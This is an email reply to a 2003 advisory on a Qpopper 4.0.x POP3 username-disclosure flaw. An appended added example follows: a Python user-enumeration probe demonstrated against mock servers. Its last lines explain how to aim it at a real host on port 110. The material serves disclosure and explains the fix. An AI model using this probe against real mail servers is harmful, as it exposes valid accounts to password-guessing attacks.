This bug does not exist in QPopper 3.x, as it simply closes the connection
regardless of whether the username is valid or not.

Regards,
Justin Wheeler
--
Programmer - A red-eyed, mumbling mammal capable of conversing with inanimate objects.

On Wed, 18 Jun 2003, Marc Lafortune wrote:

> =============================================================================
> ConnecTalk Inc. Security Advisory
>
> Topic: Qpopper leaks information during authentication
>
> Vendor: Eudora
> Product: qpopper 4.0.4 and qpopper 4.0.5
> Note: other versions have not been tested.
> Problem found: May 14, 2003
> Vendor notification: May 14, 2003
> Second vendor notification: May 21, 2003
> Public notification: June 18, 2003
>
> I. Background
>
> Qpopper is the most widely-used server for the POP3 protocol (this
> allows users to access their mail using any POP3 client). Qpopper
> supports the latest standards, and includes a large number of optional
> features. Qpopper is normally used with standard UNIX mail transfer and
> delivery agents such as sendmail or smail.
>
> II. Problem Description
>
> When Qpopper is in the authentication phase, using plain text passwords,
> the response to the PASS command differs depending on the existence of
> the USER. If a valid username and a wrong password are given, Qpopper
> returns a negative response and waits for one more command before closing
> the connection. If an invalid username and password are given, Qpopper
> returns a negative response and disconnects right away.
>
> III. Impact
>
> A remote attacker can use this information leak to validate the
> existence of a user account.
>
>
> --
> Marc Lafortune
> mlafortune@connectalk.com
> Intégrateur / Integrator
> ConnecTalk Inc.
> http://www.connectalk.com
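As an added example (not part of the original thread, and not Qpopper's, Eudora's or ConnecTalk's code), the USER/PASS exchange the advisory describes, run against two constructed mock servers over a socketpair: one reproduces the 4.0.4/4.0.5 behaviour (wrong password for a known user: -ERR, then wait for one more command; unknown user: -ERR, then disconnect at once), the other the 3.x behaviour Justin describes (always disconnect). The account names, the banner and the -ERR text are made up for the mock; only the keep-open-versus-close behaviour follows the advisory and the reply above. The probe never looks at the -ERR text, which is the same in both cases; it only checks whether the server hangs up before a short timeout.

```python
"""POP3 user-enumeration probe for the Qpopper 4.0.x behaviour difference.

Added example. The mock servers are constructed for this demonstration and
contain no Qpopper code; they reproduce only the two response patterns the
advisory and the reply describe.
"""
import socket
import threading

# Constructed sample accounts for the mock server (not a real user base).
VALID_USERS = {"alice", "bob"}
# How long the probe waits after -ERR for the server to hang up.  On a real
# network this must comfortably exceed the round-trip time or every probe
# reports "kept-open".
PROBE_TIMEOUT = 0.5
IO_TIMEOUT = 5.0


def recv_line(sock, timeout):
    """Read one CRLF-terminated line.

    Returns (state, data): state is 'line' (a full line arrived), 'eof'
    (the peer closed the connection) or 'timeout' (nothing arrived in time).
    """
    sock.settimeout(timeout)
    buf = b""
    while not buf.endswith(b"\r\n"):
        try:
            chunk = sock.recv(1)
        except socket.timeout:
            return ("timeout", buf)
        if not chunk:
            return ("eof", buf)
        buf += chunk
    return ("line", buf)


def mock_qpopper_4(conn):
    """Mock of the 4.0.4/4.0.5 behaviour described in the advisory."""
    conn.sendall(b"+OK mock POP3 server ready\r\n")
    _, user_line = recv_line(conn, IO_TIMEOUT)
    user = user_line.split(b" ", 1)[-1].strip()
    conn.sendall(b"+OK Password required for " + user + b".\r\n")
    recv_line(conn, IO_TIMEOUT)  # PASS line; the mock never accepts a password
    conn.sendall(b"-ERR [AUTH] Authentication failed.\r\n")  # same text either way
    if user.decode(errors="replace") in VALID_USERS:
        recv_line(conn, IO_TIMEOUT)  # known user: wait for one more command
    conn.close()


def mock_qpopper_3(conn):
    """Mock of the 3.x behaviour from the reply: always disconnect after -ERR."""
    conn.sendall(b"+OK mock POP3 server ready\r\n")
    recv_line(conn, IO_TIMEOUT)
    conn.sendall(b"+OK Password required.\r\n")
    recv_line(conn, IO_TIMEOUT)
    conn.sendall(b"-ERR [AUTH] Authentication failed.\r\n")
    conn.close()


def probe(sock, username, password="not-the-password"):
    """Client side. Returns 'kept-open', 'closed', 'authenticated' or 'unexpected'.

    Against a 4.0.x server 'kept-open' means the username exists.  Against a
    server that always disconnects, every probe says 'closed' and nothing leaks.
    """
    recv_line(sock, IO_TIMEOUT)  # banner
    sock.sendall(b"USER " + username.encode() + b"\r\n")
    recv_line(sock, IO_TIMEOUT)
    sock.sendall(b"PASS " + password.encode() + b"\r\n")
    state, reply = recv_line(sock, IO_TIMEOUT)
    if state == "line" and reply.startswith(b"+OK"):
        return "authenticated"  # the guess was right, which also confirms the user
    if state != "line" or not reply.startswith(b"-ERR"):
        return "unexpected"
    state, _ = recv_line(sock, PROBE_TIMEOUT)  # EOF here means immediate disconnect
    if state == "eof":
        return "closed"
    try:
        sock.sendall(b"QUIT\r\n")  # the server was still waiting for a command
    except OSError:
        pass
    return "kept-open"


def run_probe(server_fn, username):
    """Run server_fn on one end of a socketpair and the probe on the other."""
    client, server = socket.socketpair()
    worker = threading.Thread(target=server_fn, args=(server,), daemon=True)
    worker.start()
    try:
        return probe(client, username)
    finally:
        client.close()
        worker.join(timeout=IO_TIMEOUT)


def enumerate_users(server_fn, candidates):
    """Probe each candidate name; return {name: verdict}."""
    return {name: run_probe(server_fn, name) for name in candidates}


if __name__ == "__main__":
    for label, fn in (("4.0.x mock", mock_qpopper_4), ("3.x mock", mock_qpopper_3)):
        print(label, enumerate_users(fn, ["alice", "mallory"]))
```

Against a real host the socketpair is replaced by a TCP connection to port 110 and PROBE_TIMEOUT has to be raised above the network round trip, since the signal is timing rather than reply text; the 3.x mock also shows the fix the reply implies, namely behaving identically (here, disconnecting) whether or not the username exists.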